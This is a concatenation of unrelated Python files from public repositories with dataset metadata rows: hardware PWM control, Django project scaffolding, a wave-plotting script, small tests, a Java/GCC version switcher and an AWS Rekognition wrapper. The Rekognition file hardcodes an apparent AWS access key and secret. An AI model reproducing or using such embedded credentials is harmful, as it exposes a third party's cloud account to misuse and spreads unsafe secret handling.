class PWMProviderPCA9685(PWMProvider):
    """Concrete PWM provider backed by a PCA9685 16-channel PWM controller."""
    # PCA9685 output frequency limits in Hz (24-1526 per the NXP datasheet).
    MIN_FREQ = 24
    MAX_FREQ = 1526
    # The PCA9685 exposes 16 PWM channels, numbered 0-15.
    MIN_PIN = 0
    MAX_PIN = 15

    def __init__(self, device, pin):
        """Creates a PWM provider.

        device -- PCA9685 device wrapper; must expose get_pwm_frequency,
                  set_pwm_frequency and set_pwm
        pin    -- channel number on that device (0-15)
        """
        self.__logger = logging.getLogger('hw.pwm.pwm-provider-pca9685')
        self.__dev = device
        self.__pin = pin
        self.__logger.info('PCA9685 PWM provider created')
        self.__logger.info('Pin: %d', pin)
        assert(self.__pin >= self.MIN_PIN)
        assert(self.__pin <= self.MAX_PIN)
        super(PWMProviderPCA9685, self).__init__(self.MIN_FREQ, self.MAX_FREQ)

    def set_duty(self, duty):
        """Sets the duty cycle of the pin specified by the PWM provider.
        Duty cycle is expressed as a percentage.
        """
        self.__logger.info('Requested duty: %d', duty)
        # TODO: these checks should probably be moved to the base class
        # Check that the duty cycle requested is valid
        assert(duty >= self._min_duty)
        assert(duty <= self._max_duty)
        self.__logger.info('Limited duty: %d', duty)
        # Scale the percentage to the PCA9685's 12-bit (0-0x0FFF) range.
        duty = int(duty * 0x0FFF / 100)
        self.__logger.info('Scaled duty: %d', duty)
        PWMProvider.set_duty(self, duty)

    def set_freq(self, freq):
        """Set PWM frequency for the PWM provider.
        For the PCA9685 this affects all pins simultaneously.
        """
        self.__logger.info('Current freq: %d', self.__dev.get_pwm_frequency())
        self.__logger.info('Requested freq: %d', freq)
        # TODO: these checks should probably be moved to the base class
        # Check that the freq requested is valid.
        # BUGFIX: the upper bound used to be compared against self._max_duty
        # (the duty-cycle limit), which rejected almost every valid
        # frequency; the bounds are also inclusive (24-1526 Hz), matching
        # the style of set_duty's checks.
        assert(freq >= self._min_freq)
        assert(freq <= self._max_freq)
        # Skip the (relatively slow) device write when nothing would change.
        if(freq == self.__dev.get_pwm_frequency()):
            return
        self.__dev.set_pwm_frequency(freq)

    def turn_on(self):
        """Turn on the PWM provider at the set duty cycle"""
        self.__dev.set_pwm(self.__pin, self._duty)

    def turn_off(self):
        """Turn off the PWM provider"""
        self.__dev.set_pwm(self.__pin, 0)
| [
"geoffrey.thomas@garmin.com"
] | geoffrey.thomas@garmin.com |
5a9dff2f0a91e131b60e46a368beace41b98b3dd | f0c9df58c012c7fcd64346cc5a3ac0275656156f | /BM3D_py/cpp2py_test/close_power_of_2_test.py | c16be25364ba84dcdf092a1eaef023b746667cfd | [
"MIT"
] | permissive | oleges1/denoising_project | 48c32e419bd9172354b6bf30eae7fe47db37817d | c2b5048db3dd2bf3261d0cd2e8fec0588d765387 | refs/heads/master | 2023-01-02T08:23:54.705304 | 2020-10-22T14:35:19 | 2020-10-22T14:35:19 | 306,343,881 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 508 | py | import numpy as np
def my_closest_power_of_2(M, max):
    """Vectorised floor-to-power-of-two.

    Every element of M is mapped to the largest power of two that does not
    exceed it, capped at `max` (which must itself be a power of two).
    Elements of 0 and 1 are returned unchanged.
    """
    result = np.where(max < M, max, M)  # cap everything at `max` first
    bound = max
    while bound > 1:
        half = bound // 2
        # Anything strictly between half and bound rounds down to half.
        result = np.where((half < result) & (result < bound), half, result)
        bound //= 2
    return result
def closest_power_of_2(n):
    """Return the largest power of two that is <= n (1 when n < 2)."""
    power = 1
    while power + power <= n:
        power += power
    return power
if __name__ == '__main__':
    # Print scalar results for 0..19, then the vectorised variant over 0..59
    # capped at 16, to eyeball that both behave as expected.
    for i in range(20):
        print(i, closest_power_of_2(i))
    n = np.arange(60)
    res_n = my_closest_power_of_2(n, 16)
    for i, v in enumerate(res_n):
        print(i, '-->', v)
| [
"ya.hef@yandex.ru"
] | ya.hef@yandex.ru |
d017df644bde5225b2ea4930d586dc593bd9fa99 | d24f39c95eb2fc89851d90464eb0cdf3b2c6c60f | /Ondas Planas/movimento_sem_ateunacao.py | bccad25aaecfea2adbf04f2fe0a877cc2cb7416d | [] | no_license | marcos-moura97/eletromagnetism_python | d74c62a85df0e2b81e18555583ce4146fd106e0f | f44f7afc5fad8ffc58dd8be5ec7e074a37b69e41 | refs/heads/master | 2023-08-28T08:10:02.568516 | 2021-11-04T10:48:05 | 2021-11-04T10:48:05 | 299,422,313 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,681 | py | import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import math
pi = math.pi #Famoso pi
Emaxmais = 10 #Amplitude do campo incidente
FimaisGraus = 0 #Fase Finais (graus) da amplitude do campo incidente
Emaxmenos = 10 #Amplitude do campo refletido
FimenosGraus = 0 #Fase Fimenos (graus) da amplitude do campo refletido
nco = 2 #Numero de comprimentos de onda para o tracado do grafico.
# Chamei de ng o Numero de Graficos de ondas desejado. Comece com ng=1,
# depois faca ng = 2, 3, 4,...,18,...,36,... para voce ver a formacao da onda
ng=18 #Numero de graficos de ondas desejado.
# Chamei de step a defasagem em graus (wt) de um grafico para outro.
# Se o step for 5 graus, e.g., entao, para termos uma volta completa no circulo
# trigonometrico, teremos que fazer ng = 72, pois 72x5=360 graus, isto significa
# que a defasagem entre o primeiro e o ultimo grafico eh 360 graus. Um bom par
# eh ng=36 e step=10. (e.g.= exempli gratia (Latim) = por exemplo)
step = 20 #Defasagem em graus de um grafico para outro
####################### SOBRE O FILME ################
n = 2 #Numero de vezes de repeticao do filme
fps = 1 #Numero de quadros por segundo (frames por segundo) do filme
################### INICIO DOS CALCULOS ################
eps=2.2204e-16 #para evitar dividir por 0
SWR=(Emaxmais+Emaxmenos)/((Emaxmais-Emaxmenos)+eps)
modulo_Coeficiente_Reflexao = (SWR-1)/(SWR+1)
Perda_de_Retorno_dB= 20 * math.log10(modulo_Coeficiente_Reflexao)
Fimais = FimaisGraus*pi/180 #transforma graus para radianos
Fimenos = FimenosGraus*pi/180 #transforma graus para radianos
Bzmax = nco*2*pi #transforma graus para radianos
################## INICIO DAS MATRIZES ################
Bz = np.linspace(0, Bzmax,100) #faz Bz (Beta_z) variar linearmente espacado de 0 a Bzmax
OndaIncidente = np.zeros([ng,len(Bz)]) #inicia a matriz que guardará o valor da onda incidente de todos os ng gráficos
OndaRefletida = np.zeros([ng,len(Bz)]) #inicia a matriz que guardará o valor da onda refletida de todos os ng gráficos
OndaTotal = np.zeros([ng,len(Bz)]) #inicia a matriz que guardará o valor total da onda para todos os ng gráficos
ims=[]
fig = plt.figure()
for k in range(ng): # Equivale a variar o tempo. Cada valor de k equivale a um dado tempo (wt)
wtGraus = step*(k-1) # faz omega_t variar em graus, comecando em 0 graus
wt = wtGraus*pi/180 # transforma omega_t de graus para radianos
Envoltoria=np.sqrt(Emaxmais**2 + Emaxmenos**2 + 2*Emaxmais*Emaxmenos*np.cos(2*Bz+Fimenos-Fimais))
#Armazena nas matrizes os valores dos graficos incidente, refletido e total para cada tempo
OndaIncidente[k] = Emaxmais*np.cos(wt-Bz+Fimais)
OndaRefletida[k] = Emaxmenos*np.cos(wt+Bz+Fimenos)
OndaTotal[k]= OndaIncidente[k] + OndaRefletida[k] #Emaxmais*np.cos(wt-Bz+Fimais)+Emaxmenos*np.cos(wt+Bz+Fimenos)
#Plota o grafico da envoltoria e das tres ondas, incidente, refletida e total, simultaneamente.
# im = plt.imshow(OndaRefletida, animated=True)
# ims.append([im])
#ani = animation.ArtistAnimation(fig, ims, interval=50, blit=True,
# repeat_delay=1000)
plt.plot(Bz,Envoltoria,'g--', Bz,-Envoltoria,'g--', label="Envoltória")
plt.plot(Bz,OndaTotal[k],'b', label="Onda Total")
plt.plot(Bz,OndaIncidente[k],'r--', label="Onda Incidente")
plt.plot(Bz,OndaRefletida[k],'k--', label="Onda Refletida")
legend = plt.legend(loc='upper right', shadow=True, fontsize='small')
# Put a nicer background color on the legend.
legend.get_frame().set_facecolor('C0')
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
5415aabb59728ebc4a5c6162aa5db91bddd6490d | a9e3f3ad54ade49c19973707d2beb49f64490efd | /Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/cms/envs/devstack_docker.py | 2eece814deae2c31cf5456b34af9e0f386c38c4e | [
"AGPL-3.0-only",
"AGPL-3.0-or-later",
"MIT"
] | permissive | luque/better-ways-of-thinking-about-software | 8c3dda94e119f0f96edbfe5ba60ca6ec3f5f625d | 5809eaca7079a15ee56b0b7fcfea425337046c97 | refs/heads/master | 2021-11-24T15:10:09.785252 | 2021-11-22T12:14:34 | 2021-11-22T12:14:34 | 163,850,454 | 3 | 1 | MIT | 2021-11-22T12:12:31 | 2019-01-02T14:21:30 | JavaScript | UTF-8 | Python | false | false | 129 | py | """ Overrides for Docker-based devstack. """
from .devstack import * # pylint: disable=wildcard-import, unused-wildcard-import
| [
"rafael.luque@osoco.es"
] | rafael.luque@osoco.es |
a51b08bd33feac6916911115650f7cd6e8d8124f | 194d3a2a704497ab4462cf29528df030cc8ddc54 | /binarysearch.py | 04cbc935c02205db3c05a96f4aa1ca346e00c2d6 | [] | no_license | nitinps/PESU-IO-SUMMER | f3525d76f55cddb92111641fd1ca3dcad338fb1e | e197c6f95ebd3f3c68bde0715656c713903f7cdc | refs/heads/master | 2020-05-31T15:17:13.064978 | 2019-07-07T17:34:49 | 2019-07-07T17:34:49 | 190,353,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 473 | py | numbers=[]
pos=-1
found=0
low=0
high=int(input("Enter length of list: "))
print("Enter numbers: ")
for i in range(0,high):
k=int(input())
numbers.append(k)
x=int(input("Enter number you want to search: "))
while low<=high and found==0:
mid=int((low+high)/2)
if(numbers[mid]==x):
pos=mid
found=1
elif x<numbers[mid]:
high=mid-1
else:
low=mid+1
if pos==-1:
print('Not found')
else:
print('found at position: ',pos)
| [
"51399837+nitinps@users.noreply.github.com"
] | 51399837+nitinps@users.noreply.github.com |
1a8fdc4014ea36359c165795b904676bd01011cd | 2636b249a82b8bdeb02166aea94f3941dece962c | /manage.py | 768c4e6fb3926f7578c87b80e90dcac45f7d286b | [] | no_license | van0509/muxueonline | 87a2f542f5b9bf15d43cf49710bb92e9f0e65266 | 1dd02a0ecff114575b27463ad1aa5b555089430c | refs/heads/master | 2020-03-27T07:52:39.566043 | 2018-09-06T12:55:59 | 2018-09-06T12:56:00 | 146,198,946 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 543 | py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'muxueonline.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"free001@vip.qq.com"
] | free001@vip.qq.com |
10e8fdc24e2631260da50fd20f4deaaab12510ab | c1e0874f55d05ee990ed2d637c2910701b32d246 | /soft_uni_fundamentals/Data Types and Variables/exercises/03_elevator.py | 6b18bc3621dfad99d97435503cea446731f70608 | [] | no_license | borislavstoychev/Soft_Uni | 5d047bef402c50215e0abc825476326889ffd0be | ccc0b2fb18f8ad6809b475eb20e82a9e4eb4b0b0 | refs/heads/master | 2023-05-11T12:27:08.672058 | 2021-05-28T18:00:10 | 2021-05-28T18:00:10 | 277,556,731 | 3 | 2 | null | 2021-02-11T19:57:37 | 2020-07-06T13:58:23 | Python | UTF-8 | Python | false | false | 119 | py | n = int(input())
p = int(input())
if n % p == 0:
courses = n//p
else:
courses = n // p + 1
print(courses) | [
"noreply@github.com"
] | noreply@github.com |
7e8163e5286903c46159443b731345784fe85218 | de69dd4c86f7c7b0a5a1fa0c27fb45c8241b36ea | /reserveTime/asgi.py | ea213ba502d8da84f87ec7ab762a76eb8928f976 | [] | no_license | Sim30n/DIY-online-booking | bec065abc546b9915c3bbab9af3f7e6d7a797be9 | 68ab52506d0294260f7746762908265738854007 | refs/heads/main | 2023-03-10T03:05:59.492591 | 2021-02-21T14:35:57 | 2021-02-21T14:35:57 | 336,381,521 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | """
ASGI config for reserveTime project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'reserveTime.settings')
application = get_asgi_application()
| [
"petteri.sarkka@fmail.com"
] | petteri.sarkka@fmail.com |
a6d0047071d0b232286f98b5287c49a605e6a21e | 320a98d428bf06eff6f3f209b1eadeb366a65482 | /common/version.py | c4dd9de7ffd4c1b577a51386ff7b1cc74c444cd3 | [] | no_license | Ryan--Yang/share | 6fe8b21918206fed903bd7a315216b47e58f697e | 4acc658f7c0a8f1b50f7b5c0b8884b96fe1e137d | refs/heads/master | 2020-12-31T02:42:22.125477 | 2013-12-04T07:27:53 | 2013-12-24T01:54:38 | 14,791,494 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,644 | py | from util import *
default_java_file = '/usr/lib/jvm/default-java'
gcc_file = '/usr/bin/gcc'
def handle_option():
global args
parser = argparse.ArgumentParser(description = 'Set up the version of Java',
formatter_class = argparse.RawTextHelpFormatter,
epilog = '''
examples:
python %(prog)s -v 1.5
python %(prog)s -v 1.7.0_45
''')
parser.add_argument('-s', '--set-version', dest='set_version', help='set version')
parser.add_argument('-g', '--get', dest='get_version', help='get version', action='store_true')
parser.add_argument('-t', '--target', dest='target', help='target to set version with', choices=['java', 'gcc'], default='gcc')
args = parser.parse_args()
if len(sys.argv) <= 1:
parser.print_help()
def setup():
pass
def get_version():
if not args.get_version:
return
if args.target == 'java':
get_version_java()
elif args.target == 'gcc':
get_version_gcc()
def set_version():
if not args.set_version:
return
if args.target == 'java':
set_version_java()
elif args.target == 'gcc':
set_version_gcc()
def get_version_java():
java_version_result = execute('java -version', silent=True, catch=True)
match = re.match('java version "(.*)"', java_version_result)
java_version = match.group(1)
java_home_result = os.getenv('JAVA_HOME')
if java_home_result:
match = re.match('jdk(.*)', java_home_result)
if match:
java_home = match.group(1)
else:
error('JAVA_HOME is not expected')
else:
java_home = 'NULL'
if os.path.exists(default_java_file):
default_java_result = execute('ls -l ' + default_java_file, silent=True, catch=True)
match = re.match('.*jdk(.*)', default_java_result)
if match:
default_java = match.group(1)
else:
error('default-java is not expected')
else:
default_java = 'NULL'
#info(java_version_result)
#if java_home_result:
# info(java_home_result)
#if default_java_result:
# info(default_java_result)
info('java -v: ' + java_version)
info('JAVA_HOME: ' + java_home)
info('default-java: ' + default_java)
def set_version_java():
if args.set_version == '1.5':
version = '1.5.0_22'
elif args.set_version == '1.6':
version = '1.6.0_45'
elif args.set_version == '1.7':
version = '1.7.0_45'
else:
version = args.set_version
execute('sudo update-alternatives --install /usr/bin/javac javac /usr/lib/jvm/jdk' + version + '/bin/javac 50000')
execute('sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk' + version + '/bin/java 50000')
execute('sudo update-alternatives --install /usr/bin/javaws javaws /usr/lib/jvm/jdk' + version + '/bin/javaws 50000')
execute('sudo update-alternatives --install /usr/bin/javap javap /usr/lib/jvm/jdk' + version + '/bin/javap 50000')
execute('sudo update-alternatives --install /usr/bin/jar jar /usr/lib/jvm/jdk' + version + '/bin/jar 50000')
execute('sudo update-alternatives --install /usr/bin/jarsigner jarsigner /usr/lib/jvm/jdk' + version + '/bin/jarsigner 50000')
execute('sudo update-alternatives --config javac')
execute('sudo update-alternatives --config java')
execute('sudo update-alternatives --config javaws')
execute('sudo update-alternatives --config javap')
execute('sudo update-alternatives --config jar')
execute('sudo update-alternatives --config jarsigner')
execute('sudo rm -f ' + default_java_file)
execute('sudo ln -s /usr/lib/jvm/jdk' + version + ' /usr/lib/jvm/default-java')
get_version_java()
def get_version_gcc():
gcc_version_result = execute('ls -l ' + gcc_file, silent=True, catch=True)
match = re.match('.+gcc-(.+)', gcc_version_result)
if match:
gcc_version = match.group(1)
else:
error('gcc is not expected')
info('gcc version: ' + gcc_version)
def set_version_gcc():
version = args.set_version
execute('sudo rm -f /usr/bin/gcc', silent=True)
execute('sudo ln -s /usr/bin/gcc-' + version + ' /usr/bin/gcc', silent=True)
execute('sudo rm -f /usr/bin/g++', silent=True)
execute('sudo ln -s /usr/bin/g++-' + version + ' /usr/bin/g++', silent=True)
execute('sudo rm -f /usr/bin/cc', silent=True)
execute('sudo ln -s /usr/bin/gcc /usr/bin/cc', silent=True)
get_version_gcc()
if __name__ == "__main__":
handle_option()
setup()
get_version()
set_version() | [
"yang.gu@intel.com"
] | yang.gu@intel.com |
e8ad07e31379beae3dffbece9f29e72942cd9ab7 | 9f2a944624d3499555e31b384fc0611a4a834b41 | /cookies-ver.py | 906cb912efe7683f08d77f771b218d77cd7ee3c3 | [] | no_license | silver926z/cprog_parser | 8c3079c85fd92864745baf169d064b50ddf685c4 | b6f4616a26483275fb3860ca2be7a35fd854a850 | refs/heads/master | 2021-01-25T09:37:27.526275 | 2017-06-09T12:53:37 | 2017-06-09T12:53:37 | 93,858,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,518 | py |
import requests
from bs4 import BeautifulSoup
import lxml
url = "http://www.niotv.com/i_index.php?cont=day"
headers = {
"Host": "www.niotv.com",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:43.0) Gecko/20100101 Firefox/43.0",
"Accept": "image/png,image/*;q=0.8,*/*;q=0.5",
"Accept-Language": "zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Referer": "http://www.niotv.com/i_index.php?cont=day",
"Cookie": "_ga=GA1.2.1557690102.1493724956; _gid=GA1.2.710482855.1493814386; __utma=43184058.1557690102.1493724956.1493803446.1493814295.4; __utmz=43184058.1493724956.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=mhkgpmh939ue0309db2aftpvr3; __utmb=43184058.4.10.1493814296; __utmc=43184058; __utmt=1; _gat=1",
"Connection": "keep-alive",
"If-Modified-Since": "Wed, 04 May 2017 12:01:45 GMT",
"If-None-Match": "4fc99fe0-38-6b903c40"
}
form_data = {
"act": "select",
"sch_id": "20",
# "ch_name": "TVBS",
"day" : "2017-06-09",
"grp_id":"-1",
"cont":"day"
}
s = requests.Session()
_h=dict(headers)
res = s.post(url,headers=_h,data=form_data)
with open('download.html',"w") as f:
f.write(res.content)
soup = BeautifulSoup(res.content,"lxml")
# print soup
z=soup.find_all('img')
print len(z)
z = z[20]
print "##",z
print z['src']
dd=str(z)[23:-3]
print 'url',url[:-20]
# url == http://www.niotv.com/
new=url[:-20]+z['src']
img = s.get(new,headers=_h)
# print img.content
with open('tmp',"w") as f:
f.write(img.content) | [
"silver926z@gmail.com"
] | silver926z@gmail.com |
b53ae71c9ed4ce817b4e285d4827aaf89a7c7035 | 448c17f5a937f6f3d45a3b8da747348ec0b06e76 | /tests/test_pinpoint.py | 681518f7d8c06ea39ef8f2901d4525542ccda18b | [
"MIT"
] | permissive | surajitdb/pyscissor | a85f5d6c44c2e3b28d48ec61ed89b2dd98fc7c02 | 247e819d2d87c982df20ee42bce2b881e89d5f25 | refs/heads/master | 2023-01-12T02:25:53.564677 | 2020-11-18T12:15:50 | 2020-11-18T12:15:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 818 | py | import unittest
import numpy as np
from pyscissor import pinpoint
import pytest
class test_scissor(unittest.TestCase):
# generel + lat not reversed
def test_generel_lnr(self):
lats = np.array([24,23])
lons = np.array([88,89])
vals = np.array([[1,2],[3,4]])
t = pinpoint(lats,lons)
t.set_xy(23.6,88.6)
self.assertLess( abs( ( 3.6+ 0.6* (1.6-3.6) ) - t.bilinear(vals) ), 0.00001)
# generel + lat reversed
def test_generel_lr(self):
lats = np.array([23,24])
lons = np.array([88,89])
vals = np.array([[1,2],[3,4]])
t = pinpoint(lats,lons)
t.set_xy(23.6,88.6)
self.assertLess(abs( ( 1.6 + 0.6* (3.6-1.6) ) - t.bilinear(vals) ), 0.00001)
if __name__ == '__main__':
unittest.main() | [
"nzahasan@gmail.com"
] | nzahasan@gmail.com |
4de8e6f3f997c044235468a34eb39dc9ca07df91 | df458ae26f8e1b59e4fc4273701f77cc2e340a3c | /tests/test_viewgroups.py | a7c869008bd24a94bbc80a387a23758393244f2e | [
"BSD-3-Clause"
] | permissive | radiac/django-fastview | 64bcf3f07ed62a1863b5a402d1fedc998ed433f3 | daf898f416c3f89efc3ef290f8158232d055af36 | refs/heads/develop | 2023-03-20T22:49:14.789026 | 2022-10-02T19:43:22 | 2022-10-02T19:43:22 | 230,815,383 | 13 | 1 | NOASSERTION | 2023-03-04T05:44:10 | 2019-12-29T23:26:56 | Python | UTF-8 | Python | false | false | 1,637 | py | """
Test viewgroup
"""
from fastview import permissions
from fastview.viewgroups import ModelViewGroup
from .app.models import Entry
def test_modelviewgroup_permissions__permissions_set_on_subclass():
class TestPermission(permissions.Permission):
pass
test_permission = TestPermission()
class Entries(ModelViewGroup):
permission = test_permission
model = Entry
# Permissions are set at instantiation
entries = Entries()
assert entries.index_view.get_permission() == test_permission
assert entries.detail_view.get_permission() == test_permission
assert entries.create_view.get_permission() == test_permission
assert entries.update_view.get_permission() == test_permission
assert entries.delete_view.get_permission() == test_permission
# Not at definition
assert isinstance(Entries.index_view.get_permission(), permissions.Denied)
assert isinstance(Entries.detail_view.get_permission(), permissions.Denied)
assert isinstance(Entries.create_view.get_permission(), permissions.Denied)
assert isinstance(Entries.update_view.get_permission(), permissions.Denied)
assert isinstance(Entries.delete_view.get_permission(), permissions.Denied)
def test_modelviewgroup_index__index_lists(add_url, client, user_owner):
class Entries(ModelViewGroup):
permission = permissions.Public()
model = Entry
Entry.objects.create(author=user_owner)
Entry.objects.create(author=user_owner)
add_url("", Entries().include(namespace="entries"))
response = client.get("/")
assert len(response.context_data["object_list"]) == 2
| [
"git@radiac.net"
] | git@radiac.net |
6d7552c80362211c8655afa1523750f82b5f34b9 | cbdbb05b91a4463639deefd44169d564773cd1fb | /djangoproj/forms_lab/lab/models.py | a49bb957d8bc48b023dce230a3be6f848e11e28a | [] | no_license | blazprog/py3 | e26ef36a485809334b1d5a1688777b12730ebf39 | e15659e5d5a8ced617283f096e82135dc32a8df1 | refs/heads/master | 2020-03-19T20:55:22.304074 | 2018-06-11T12:25:18 | 2018-06-11T12:25:18 | 136,922,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 354 | py | from django.db import models
class Nakup(models.Model):
datum_nakupa = models.DateField()
trgovina = models.CharField(max_length=30)
class NakupIzdelki(models.Model):
nakup = models.ForeignKey(Nakup)
izdelek = models.CharField(max_length=30)
kolicina = models.IntegerField(default=1)
cena = models.FloatField(default=0)
| [
"blaz.korosec@mentis.si"
] | blaz.korosec@mentis.si |
85459e0cbd82140fa14886b0e5285bd8b8a76a28 | b1303152c3977a22ff9a0192c0c32310e65a6d77 | /python/567.permutation-in-string.py | c5487e09f925108dce4b4931b43c66fadd915fda | [
"Apache-2.0"
] | permissive | stavanmehta/leetcode | 1b8da1c2bfacaa76ddfb96b8dbce03bf08c54c27 | 1224e43ce29430c840e65daae3b343182e24709c | refs/heads/master | 2021-07-15T16:02:16.107962 | 2021-06-24T05:39:14 | 2021-06-24T05:39:14 | 201,658,706 | 0 | 0 | Apache-2.0 | 2021-06-24T05:39:15 | 2019-08-10T16:59:32 | Java | UTF-8 | Python | false | false | 81 | py | class Solution:
def checkInclusion(self, s1: str, s2: str) -> bool:
| [
"noreply@github.com"
] | noreply@github.com |
a6c3b2d3c30d77febcd634cf65a7f06d7baf74a8 | bd408f54b0bcd9c37c2fe38195a1caa3480c1d68 | /library/rekognition.py | 96c999a38a26a64154d6dafd33615b95b7d5ac07 | [] | no_license | clara081094/refactoredRekognition | 601c33396dbeb9cf2d799537e85beb6d7bc712c8 | 4f61d2727a22c6de021a6d28077fa5cc3aabb02e | refs/heads/master | 2023-09-04T03:15:08.615401 | 2019-02-01T19:11:35 | 2019-02-01T19:11:35 | 168,747,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,260 | py | import boto3
import json
#from botocore.exceptions import ClientError
class Rekognition(object):
def __init__(self):
self.client = boto3.client(
'rekognition',
region_name="us-east-1",
aws_access_key_id="AKIAIMM524QL43QPT43A",
aws_secret_access_key="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"
)
def detect_faces(self,bytess):
response = self.client.detect_faces(
Image={'Bytes': bytess }, Attributes=['ALL'])
return response
def face_recog(self,bytess,collectionId):
try:
response = self.client.search_faces_by_image(
CollectionId=collectionId,
Image={
'Bytes': bytess
},
FaceMatchThreshold=75
)
return response
except:
print("Error over face")
return "BAD"
def index_faces(self,bytess,collectionId,idImage):
try:
response = self.client.index_faces(
Image={'Bytes': bytess}, CollectionId=collectionId, ExternalImageId=idImage)
return response
except:
print("Error over face")
return "BAD"
| [
"clara.081094@gmail.com"
] | clara.081094@gmail.com |
6653c822271f595c1ee6011406a88613852cd291 | 3325f16c04ca8e641cbd58e396f983542b793091 | /Seção 13 - Leitura e Escrita em Arquivos/Exercícios da Seção/Exercício_04.py | 3140f4c4229bb75d6849a37c399fbae14f608b1f | [] | no_license | romulovieira777/Programacao_em_Python_Essencial | ac929fbbd6a002bcc689b8d6e54d46177632c169 | e81d219db773d562841203ea370bf4f098c4bd21 | refs/heads/master | 2023-06-11T16:06:36.971113 | 2021-07-06T20:57:25 | 2021-07-06T20:57:25 | 269,442,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py | """
4) Faça um programa que receba do usuário um arquivo texto e mostre na tela
quantas letras são vogais e quantas são consoantes
"""
from Exercício_03 import conta_vogais
def conta_consoantes(txt):
"""Retorna a quantidade de consoantes que existe no texto recebido por parâmetro.
Caso o que for recebido por parâmetro não seja uma string, retornará um valor do tipo None"""
try:
consoantes = ['b', 'c', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'm', 'n',
'p', 'q', 'r', 's', 't', 'v', 'w', 'x', 'y', 'z']
txt = txt.lower()
qtd = 0
for consoante in consoantes:
qtd += txt.count(consoante)
return qtd
except AttributeError:
return None
if __name__ == '__main__':
nome_arquivo = str(input("Digite o caminho do arquivo ou o nome do arquivo "
"(caso o arquivo esteja no mesmo local do programa): "))
nome_arquivo = nome_arquivo if ".txt" in nome_arquivo else nome_arquivo + ".txt"
try:
with open(nome_arquivo, 'r', encoding='utf-8') as arquivo:
texto = arquivo.read()
print(f"\nO arquivo texto tem {conta_vogais(texto)} vogais e {conta_consoantes(texto)} consoantes!")
except FileNotFoundError:
print("\nArquivo informado não encontrado!")
except OSError:
print("\nO SO não aceita caracteres especiais em nomes de arquivo!")
| [
"romulo.vieira777@gmail.com"
] | romulo.vieira777@gmail.com |
eed858b8e82142df84227a811836ca3ac041cc93 | f74602a8f37fc9357ba7d638ada8f0df8e2d85c1 | /CFG.py | da09e3c8ab87ee2df8b5323b4fb99de443f08c81 | [] | no_license | VictorTonyXie/PDA2Chomsky | 128d34f580bbdf38aec4688e5f9f284330184d98 | 5014f463f8780fb54f25f3d6cd2d0c7bf3cc5a4f | refs/heads/main | 2023-02-10T16:24:56.513324 | 2021-01-03T11:23:39 | 2021-01-03T11:23:39 | 326,349,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,211 | py | class CFG:
variables: list[str] = []
terminals: list[str] = []
start_variable: str
production_rules: dict[str, list[list[str]]] = {}
def __init__(self, variables: list[str], terminals: list[str], start_variable):
self.variables = variables.copy()
self.terminals = terminals.copy()
self.start_variable = start_variable
for v in self.variables:
self.production_rules[v] = []
def isTerminal(self, ident: str):
return ident in self.terminals
def isNonTerminal(self, ident: str):
return ident in self.variables
def addRule(self, left: str, right: list[str]):
self.production_rules[left].append(right.copy())
def __str__(self, epsilon="ε"):
ret = "\n".join([f"{nont} -> {' | '.join([' '.join(single_rule) if len(single_rule) > 0 else epsilon for single_rule in self.production_rules[nont]])}" for nont in self.production_rules])
return ret
if __name__ == "__main__":
cfg = CFG(["S", "A", "B", "C"], ["a", "b"], "S")
cfg.addRule("S", ["A", "a", "B"])
cfg.addRule("A", ["a", "A"])
cfg.addRule("A", [])
cfg.addRule("B", ["b", "B"])
cfg.addRule("B", [])
print(cfg)
| [
"taoxie2006@126.com"
] | taoxie2006@126.com |
390b2f724eeeaf6d0e23372bb737c97147f3ea23 | 415e11fbf113512c3b2081a55796bcddc652b34e | /main_app/urls.py | c1775d5a977858c3a241602eb866ef810f1db2f1 | [] | no_license | cooperama/candy-collector-v2.0 | e51cdbcd67071e0423c22038843f96939fb04cc8 | 26cb58d875313693a5ec477a5bbe4efb204d9017 | refs/heads/master | 2023-02-03T13:46:39.190537 | 2020-10-31T21:33:13 | 2020-10-31T21:33:13 | 322,905,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | from django.urls import path
from . import views
urlpatterns = [
# Static
path('', views.home, name='home'),
path('about/', views.about, name='about'),
# Candy
path('candy/', views.candy_index, name='candy_index'),
path('candy/<int:candy_id>/', views.candy_detail, name='candy_detail'),
path('stores/<int:store_id>/candy/new/', views.add_candy, name='add_candy'),
# Seller(user)
path('accounts/signup/', views.signup, name='signup'),
# Stores
path('stores/', views.stores_index, name='stores_index'),
path('userstores/', views.user_stores, name='user_stores'),
path('stores/<int:store_id>/', views.store_detail, name='store_detail'),
] | [
"coope133@gmail.com"
] | coope133@gmail.com |
